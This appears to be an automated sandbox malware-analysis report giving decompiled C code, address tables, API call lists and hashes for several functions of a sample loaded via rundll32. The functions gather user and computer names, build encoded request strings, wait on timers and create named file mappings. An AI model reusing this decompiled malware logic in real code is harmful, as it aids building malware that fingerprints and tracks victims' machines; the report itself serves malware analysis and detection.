                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04351754, Relevance: 33.2, APIs: 22, Instructions: 248memorystringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04351754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t68;
				intOrPtr _t69;
				int _t72;
				void* _t73;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr _t83;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr _t95;
				void* _t97;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				signed int _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				CHAR* _t136;
				intOrPtr _t137;
				void* _t138;
				void* _t147;
				int _t148;
				void* _t149;
				intOrPtr _t150;
				void* _t152;
				long _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t161;
				void* _t162;
				void* _t164;

				_t147 = __edx;
				_t138 = __ecx;
				_t60 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t60 = GetTickCount();
				}
				_t61 =  *0x435d018; // 0x3df0b315
				asm("bswap eax");
				_t62 =  *0x435d014; // 0x3a87c8cd
				_t136 = _a16;
				asm("bswap eax");
				_t63 =  *0x435d010; // 0xd8d2f808
				asm("bswap eax");
				_t64 =  *0x435d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t65 =  *0x435d2a4; // 0x251a5a8
				_t3 = _t65 + 0x435e633; // 0x74666f73
				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x435d02c,  *0x435d004, _t60);
				_t68 = E043557AB();
				_t69 =  *0x435d2a4; // 0x251a5a8
				_t4 = _t69 + 0x435e673; // 0x74707526
				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
				_t164 = _t162 + 0x38;
				_t149 = _t148 + _t72; // executed
				_t73 = E043573E9(_t138); // executed
				_t137 = __imp__;
				_v8 = _t73;
				if(_t73 != 0) {
					_t130 =  *0x435d2a4; // 0x251a5a8
					_t7 = _t130 + 0x435e8cb; // 0x736e6426
					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
					_t164 = _t164 + 0xc;
					_t149 = _t149 + _t134;
					HeapFree( *0x435d238, 0, _v8);
				}
				_t74 = E0435614A();
				_v8 = _t74;
				if(_t74 != 0) {
					_t125 =  *0x435d2a4; // 0x251a5a8
					_t11 = _t125 + 0x435e8d3; // 0x6f687726
					wsprintfA(_t149 + _a16, _t11, _t74);
					_t164 = _t164 + 0xc;
					HeapFree( *0x435d238, 0, _v8);
				}
				_t150 =  *0x435d324; // 0x68795b0
				_t76 = E0435757B(0x435d00a, _t150 + 4);
				_t156 = 0;
				_v20 = _t76;
				if(_t76 == 0) {
					L26:
					RtlFreeHeap( *0x435d238, _t156, _a16); // executed
					return _v12;
				} else {
					_t79 = RtlAllocateHeap( *0x435d238, 0, 0x800);
					_v8 = _t79;
					if(_t79 == 0) {
						L25:
						HeapFree( *0x435d238, _t156, _v20);
						goto L26;
					}
					E0435749F(GetTickCount());
					_t83 =  *0x435d324; // 0x68795b0
					__imp__(_t83 + 0x40);
					asm("lock xadd [eax], ecx");
					_t87 =  *0x435d324; // 0x68795b0
					__imp__(_t87 + 0x40);
					_t89 =  *0x435d324; // 0x68795b0
					_t152 = E04354D2C(1, _t147, _a16,  *_t89);
					_v28 = _t152;
					asm("lock xadd [eax], ecx");
					if(_t152 == 0) {
						L24:
						HeapFree( *0x435d238, _t156, _v8);
						goto L25;
					}
					StrTrimA(_t152, 0x435c294);
					_t95 =  *0x435d2a4; // 0x251a5a8
					_push(_t152);
					_t18 = _t95 + 0x435e252; // 0x616d692f
					_t97 = E04359DEF(_t18);
					_v16 = _t97;
					if(_t97 == 0) {
						L23:
						HeapFree( *0x435d238, _t156, _t152);
						goto L24;
					}
					_t157 = __imp__;
					 *_t157(_t152, _a4);
					 *_t157(_v8, _v20);
					_t158 = __imp__;
					 *_t158(_v8, _v16);
					 *_t158(_v8, _t152);
					_t104 = E0435A5E9(0, _v8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v12 = 8;
						L21:
						E04356106();
						L22:
						HeapFree( *0x435d238, 0, _v16);
						_t156 = 0;
						goto L23;
					}
					_t108 = E04352F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
					_v12 = _t108;
					if(_t108 == 0) {
						_t161 = _v24;
						_t115 = E0435A060(_t161, _a4, _a8, _a12); // executed
						_v12 = _t115;
						_t116 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t161 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t161;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E0435147E(_t161);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t110 = _a8;
							if(_t110 != 0) {
								_t153 =  *_t110;
								_t159 =  *_a12;
								wcstombs( *_t110,  *_t110,  *_a12);
								_t113 = E04351600(_t153, _t153, _t159 >> 1);
								_t152 = _v28;
								 *_a12 = _t113;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E0435147E(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}























































                                          0x04351754
                                          0x04351754
                                          0x04351754
                                          0x0435175d
                                          0x04351766
                                          0x04351768
                                          0x04351768
                                          0x04351775
                                          0x04351780
                                          0x04351783
                                          0x04351788
                                          0x04351791
                                          0x04351794
                                          0x04351799
                                          0x0435179c
                                          0x043517a1
                                          0x043517a4
                                          0x043517b0
                                          0x043517bd
                                          0x043517bf
                                          0x043517c5
                                          0x043517ca
                                          0x043517d5
                                          0x043517d7
                                          0x043517da
                                          0x043517dc
                                          0x043517e1
                                          0x043517e7
                                          0x043517ec
                                          0x043517ef
                                          0x043517f4
                                          0x04351801
                                          0x04351803
                                          0x04351809
                                          0x04351813
                                          0x04351813
                                          0x04351815
                                          0x0435181a
                                          0x0435181f
                                          0x04351822
                                          0x04351827
                                          0x04351834
                                          0x04351836
                                          0x04351844
                                          0x04351844
                                          0x04351846
                                          0x04351854
                                          0x04351859
                                          0x0435185b
                                          0x04351860
                                          0x04351a2f
                                          0x04351a39
                                          0x04351a42
                                          0x04351866
                                          0x04351872
                                          0x04351878
                                          0x0435187d
                                          0x04351a23
                                          0x04351a2d
                                          0x00000000
                                          0x04351a2d
                                          0x04351889
                                          0x0435188e
                                          0x04351897
                                          0x043518a8
                                          0x043518ac
                                          0x043518b5
                                          0x043518bb
                                          0x043518ca
                                          0x043518d1
                                          0x043518da
                                          0x043518e0
                                          0x04351a17
                                          0x04351a21
                                          0x00000000
                                          0x04351a21
                                          0x043518ec
                                          0x043518f2
                                          0x043518f7
                                          0x043518f8
                                          0x043518ff
                                          0x04351904
                                          0x04351909
                                          0x04351a0d
                                          0x04351a15
                                          0x00000000
                                          0x04351a15
                                          0x04351912
                                          0x04351919
                                          0x04351921
                                          0x04351926
                                          0x0435192f
                                          0x04351935
                                          0x0435193c
                                          0x04351941
                                          0x04351946
                                          0x04351a45
                                          0x043519f9
                                          0x043519f9
                                          0x043519fe
                                          0x04351a09
                                          0x04351a0b
                                          0x00000000
                                          0x04351a0b
                                          0x04351950
                                          0x04351955
                                          0x0435195a
                                          0x0435195f
                                          0x0435196a
                                          0x0435196f
                                          0x04351972
                                          0x04351978
                                          0x0435197e
                                          0x04351984
                                          0x04351987
                                          0x0435198d
                                          0x04351990
                                          0x04351995
                                          0x04351999
                                          0x04351999
                                          0x043519a5
                                          0x043519b1
                                          0x043519b5
                                          0x043519b7
                                          0x043519bc
                                          0x043519be
                                          0x043519c3
                                          0x043519c8
                                          0x043519d5
                                          0x043519dd
                                          0x043519e0
                                          0x043519e0
                                          0x043519bc
                                          0x00000000
                                          0x043519a7
                                          0x043519ab
                                          0x043519e2
                                          0x043519e5
                                          0x043519ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x043519ee
                                          0x043519ad
                                          0x00000000
                                          0x043519ad
                                          0x043519a5

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04351768
                                          • wsprintfA.USER32 ref: 043517B8
                                          • wsprintfA.USER32 ref: 043517D5
                                          • wsprintfA.USER32 ref: 04351801
                                          • HeapFree.KERNEL32(00000000,?), ref: 04351813
                                          • wsprintfA.USER32 ref: 04351834
                                          • HeapFree.KERNEL32(00000000,?), ref: 04351844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04351872
                                          • GetTickCount.KERNEL32 ref: 04351883
                                          • RtlEnterCriticalSection.NTDLL(06879570), ref: 04351897
                                          • RtlLeaveCriticalSection.NTDLL(06879570), ref: 043518B5
                                            • Part of subcall function 04354D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,043552FE,?,068795B0), ref: 04354D57
                                            • Part of subcall function 04354D2C: lstrlen.KERNEL32(?,?,?,043552FE,?,068795B0), ref: 04354D5F
                                            • Part of subcall function 04354D2C: strcpy.NTDLL ref: 04354D76
                                            • Part of subcall function 04354D2C: lstrcat.KERNEL32(00000000,?), ref: 04354D81
                                            • Part of subcall function 04354D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,043552FE,?,068795B0), ref: 04354D9E
                                          • StrTrimA.SHLWAPI(00000000,0435C294,?,068795B0), ref: 043518EC
                                            • Part of subcall function 04359DEF: lstrlen.KERNEL32(?,00000000,00000000,04355335,616D692F,00000000), ref: 04359DFB
                                            • Part of subcall function 04359DEF: lstrlen.KERNEL32(?), ref: 04359E03
                                            • Part of subcall function 04359DEF: lstrcpy.KERNEL32(00000000,?), ref: 04359E1A
                                            • Part of subcall function 04359DEF: lstrcat.KERNEL32(00000000,?), ref: 04359E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04351919
                                          • lstrcpy.KERNEL32(?,?), ref: 04351921
                                          • lstrcat.KERNEL32(?,?), ref: 0435192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 04351935
                                            • Part of subcall function 0435A5E9: lstrlen.KERNEL32(?,00000000,0435D330,00000001,0435937A,0435D00C,0435D00C,00000000,00000005,00000000,00000000,?,?,?,0435207E,?), ref: 0435A5F2
                                            • Part of subcall function 0435A5E9: mbstowcs.NTDLL ref: 0435A619
                                            • Part of subcall function 0435A5E9: memset.NTDLL ref: 0435A62B
                                          • wcstombs.NTDLL ref: 043519C8
                                            • Part of subcall function 0435A060: SysAllocString.OLEAUT32(?), ref: 0435A09B
                                            • Part of subcall function 0435A060: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 0435A11E
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04351A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04351A15
                                          • HeapFree.KERNEL32(00000000,?,?,068795B0), ref: 04351A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 04351A2D
                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04351A39
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 603507560-0
                                          • Opcode ID: ccd0e4b1454454966517f49adf63837a4808e80643bb1fdc20cb0085a57bcfec
                                          • Instruction ID: 686134b96b2c6ad09dd58fe28e61ac406f18f3b93f70f64f7241240f6eb344f5
                                          • Opcode Fuzzy Hash: ccd0e4b1454454966517f49adf63837a4808e80643bb1fdc20cb0085a57bcfec
                                          • Instruction Fuzzy Hash: 6191F671900209AFDB11AFA4EC88EAE7BBDEF08354F14A155F808D7260D739ED51DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04359B6F, Relevance: 16.7, APIs: 11, Instructions: 152timememoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 4359b6f-4359ba1 memset CreateWaitableTimerA 98 4359ba7-4359c00 _allmul SetWaitableTimer WaitForMultipleObjects 97->98 99 4359d23-4359d29 GetLastError 97->99 101 4359c06-4359c09 98->101 102 4359c8b-4359c91 98->102 100 4359d2d-4359d37 99->100 103 4359c14 101->103 104 4359c0b call 43568cf 101->104 105 4359c92-4359c96 102->105 106 4359c1e 103->106 111 4359c10-4359c12 104->111 108 4359ca6-4359caa 105->108 109 4359c98-4359ca0 HeapFree 105->109 110 4359c22-4359c27 106->110 108->105 112 4359cac-4359cb6 CloseHandle 108->112 109->108 113 4359c29-4359c30 110->113 114 4359c3a-4359c68 call 4359f11 110->114 111->103 111->106 112->100 113->114 115 4359c32 113->115 118 4359cb8-4359cbd 114->118 119 4359c6a-4359c75 114->119 115->114 120 4359cdc-4359ce4 118->120 121 4359cbf-4359cc5 118->121 119->110 122 4359c77-4359c87 call 43554ac 119->122 124 4359cea-4359d18 _allmul SetWaitableTimer WaitForMultipleObjects 120->124 121->102 123 4359cc7-4359cda call 4356106 121->123 122->102 123->124 124->110 127 4359d1e 124->127 127->102
                                          C-Code - Quality: 83%
                                          			E04359B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				intOrPtr _v120;
				struct %anon52 _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				struct %anon52 _t65;
				void* _t68;
				void* _t72;
				signed int _t73;
				void* _t75;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t75 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x435d240);
					_v76 = 0;
					_v80 = 0;
					L0435B088();
					_v84.LowPart = _t46;
					_v80 = _t75;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x435d26c; // 0x3d0
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x435d24c = 5;
						} else {
							_t68 = E043568CF(); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x435d260 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t73 = _v104.LowPart;
						_t58 = _t73 << 4;
						_t78 = _t89 + (_t73 << 4) + 0x3c;
						_t74 = _t73 + 1;
						_v92.LowPart = _t73 + 1;
						_t60 = E04359F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
						_v128.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v92;
						_v104.LowPart = _t65;
						_t97 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v120 = E043554AC(_t74, _t97,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x435d244);
							goto L21;
						} else {
							__eflags =  *0x435d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04356106();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x435d248);
								L21:
								L0435B088();
								_v104.LowPart = _t60;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t72 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x435d238, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































                                          0x04359b6f
                                          0x04359b85
                                          0x04359b89
                                          0x04359b8e
                                          0x04359b95
                                          0x04359b9b
                                          0x04359ba1
                                          0x04359d29
                                          0x04359ba7
                                          0x04359ba7
                                          0x04359ba9
                                          0x04359bae
                                          0x04359baf
                                          0x04359bb5
                                          0x04359bb9
                                          0x04359bbd
                                          0x04359bcb
                                          0x04359bd9
                                          0x04359bdd
                                          0x04359bdf
                                          0x04359bec
                                          0x04359bf8
                                          0x04359bfa
                                          0x04359c00
                                          0x04359c09
                                          0x04359c14
                                          0x04359c14
                                          0x04359c0b
                                          0x04359c0b
                                          0x04359c12
                                          0x00000000
                                          0x00000000
                                          0x04359c12
                                          0x04359c1e
                                          0x00000000
                                          0x04359c22
                                          0x04359c27
                                          0x04359c32
                                          0x04359c32
                                          0x04359c3a
                                          0x04359c45
                                          0x04359c4d
                                          0x04359c56
                                          0x04359c59
                                          0x04359c5d
                                          0x04359c62
                                          0x04359c68
                                          0x00000000
                                          0x00000000
                                          0x04359c6a
                                          0x04359c6e
                                          0x04359c72
                                          0x04359c75
                                          0x00000000
                                          0x04359c77
                                          0x04359c87
                                          0x04359c87
                                          0x00000000
                                          0x04359cb8
                                          0x04359cb8
                                          0x04359cbd
                                          0x04359cdc
                                          0x04359cde
                                          0x04359ce3
                                          0x04359ce4
                                          0x00000000
                                          0x04359cbf
                                          0x04359cbf
                                          0x04359cc5
                                          0x00000000
                                          0x04359cc7
                                          0x04359cc7
                                          0x04359ccc
                                          0x04359cce
                                          0x04359cd3
                                          0x04359cd4
                                          0x04359cea
                                          0x04359cea
                                          0x04359cf2
                                          0x04359d00
                                          0x04359d04
                                          0x04359d10
                                          0x04359d12
                                          0x04359d16
                                          0x04359d18
                                          0x00000000
                                          0x04359d1e
                                          0x00000000
                                          0x04359d1e
                                          0x04359d18
                                          0x04359cc5
                                          0x00000000
                                          0x04359cbd
                                          0x04359c8b
                                          0x04359c8d
                                          0x04359c91
                                          0x04359c92
                                          0x04359c92
                                          0x04359c96
                                          0x04359ca0
                                          0x04359ca0
                                          0x04359ca6
                                          0x04359ca9
                                          0x04359ca9
                                          0x04359cb0
                                          0x04359cb0
                                          0x04359d37
                                          0x00000000

                                          APIs
                                          • memset.NTDLL ref: 04359B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04359B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04359BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04359BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04354AC4,?), ref: 04359BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04354AC4,?,00000000), ref: 04359CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04354AC4,?,00000000,?,?), ref: 04359CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04359CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 04359D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04359D10
                                            • Part of subcall function 043568CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06879388,00000000,?,7519F710,00000000,7519F730), ref: 0435691E
                                            • Part of subcall function 043568CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,068793C0,?,00000000,30314549,00000014,004F0053,0687937C), ref: 043569BB
                                            • Part of subcall function 043568CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04359C10), ref: 043569CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04354AC4,?,00000000,?,?), ref: 04359D23
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: f1ab1651316ecff18b947bcb48acd0e7296893737c55919f60c49764ad63a72f
                                          • Instruction ID: 028459035e625ff14127218cbeab601134ac810b42a50ce12d4e2d8012e61984
                                          • Opcode Fuzzy Hash: f1ab1651316ecff18b947bcb48acd0e7296893737c55919f60c49764ad63a72f
                                          • Instruction Fuzzy Hash: C2514CB1409310AFD710AF15DC44E6BBBECEF89724F50AA19F8A592160D774E944CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04351A4E, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04351A4E(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0435B082();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x435d2a4; // 0x251a5a8
				_t5 = _t13 + 0x435e836; // 0x6878dde
				_t6 = _t13 + 0x435e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0435AD1A();
				_t17 = CreateFileMappingW(0xffffffff, 0x435d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                          0x04351a4e
                                          0x04351a56
                                          0x04351a5a
                                          0x04351a60
                                          0x04351a65
                                          0x04351a6a
                                          0x04351a6d
                                          0x04351a70
                                          0x04351a75
                                          0x04351a76
                                          0x04351a79
                                          0x04351a7e
                                          0x04351a85
                                          0x04351a8f
                                          0x04351a91
                                          0x04351a92
                                          0x04351a95
                                          0x04351ab1
                                          0x04351ab7
                                          0x04351abb
                                          0x04351b09
                                          0x04351abd
                                          0x04351aca
                                          0x04351ada
                                          0x04351ae2
                                          0x04351af4
                                          0x04351af8
                                          0x00000000
                                          0x00000000
                                          0x04351ae4
                                          0x04351ae7
                                          0x04351aec
                                          0x04351aee
                                          0x04351aee
                                          0x04351acc
                                          0x04351ace
                                          0x04351afa
                                          0x04351afb
                                          0x04351afb
                                          0x04351aca
                                          0x04351b10

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04354996,?,?,4D283A53,?,?), ref: 04351A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04351A70
                                          • _snwprintf.NTDLL ref: 04351A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,0435D2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04351AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04354996,?,?,4D283A53,?), ref: 04351AC3
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04351ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04354996,?,?,4D283A53), ref: 04351AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04354996,?,?,4D283A53,?), ref: 04351B03
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: dd71c6c54a30ca871a4d65d946571372694578b6aba1bb4ca5c39ac78a569f4f
                                          • Instruction ID: 897e0cbdd1e03b0604bfa208942f5f92de4d8e5a9f3e8453e44c570913b3ac0c
                                          • Opcode Fuzzy Hash: dd71c6c54a30ca871a4d65d946571372694578b6aba1bb4ca5c39ac78a569f4f
                                          • Instruction Fuzzy Hash: 6921A176A00304BBDB21EB68DC45F9977BDEF48715F156121FA05E71A0E7B4EA04CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043593D5, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 139 43593d5-43593e9 140 43593f3-4359405 call 4356f89 139->140 141 43593eb-43593f0 139->141 144 4359407-4359417 GetUserNameW 140->144 145 4359459-4359466 140->145 141->140 146 4359468-435947f GetComputerNameW 144->146 147 4359419-4359429 RtlAllocateHeap 144->147 145->146 148 4359481-4359492 RtlAllocateHeap 146->148 149 43594bd-43594e1 146->149 147->146 150 435942b-4359438 GetUserNameW 147->150 148->149 151 4359494-435949d GetComputerNameW 148->151 152 4359448-4359457 HeapFree 150->152 153 435943a-4359446 call 4357cf7 150->153 154 435949f-43594ab call 4357cf7 151->154 155 43594ae-43594b7 HeapFree 151->155 152->146 153->152 154->155 155->149
                                          C-Code - Quality: 96%
                                          			E043593D5(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x435d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04356F89( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x435d2a0 ^ 0x76f6612d;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x435d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04357CF7(_v8 + _v8, _t64);
							}
							HeapFree( *0x435d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
